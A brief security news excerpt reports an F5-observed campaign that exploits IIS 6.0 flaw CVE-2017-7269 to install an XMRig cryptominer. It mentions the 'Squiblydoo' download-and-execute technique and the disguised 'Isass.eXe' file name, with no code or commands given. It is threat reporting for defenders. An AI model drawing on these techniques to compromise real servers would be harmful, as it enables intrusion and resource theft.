F5 researchers recently noticed a new campaign exploiting a vulnerability in Microsoft Internet Information Services (IIS) 6.0 servers (CVE–2017–7269) in order to mine Electroneum crypto-currency. Last year, ESET security researchers reported that the same IIS vulnerability was abused to mine Monero
[...]a 32bit version of a crypto-currency miner called XMRig (2.5.2)[...]
The campaign targets Windows IIS 6.0 servers through a vulnerability (CVE-2017-7269) released over a year ago.
The "Squiblydoo" technique is used to download and execute the malware.
The author named the malware file "Isass.eXe", likley to camouflage it as the legitimate Isass.exe process.
The malware hosting server resides in Beijing, China, inside China Unicom's network.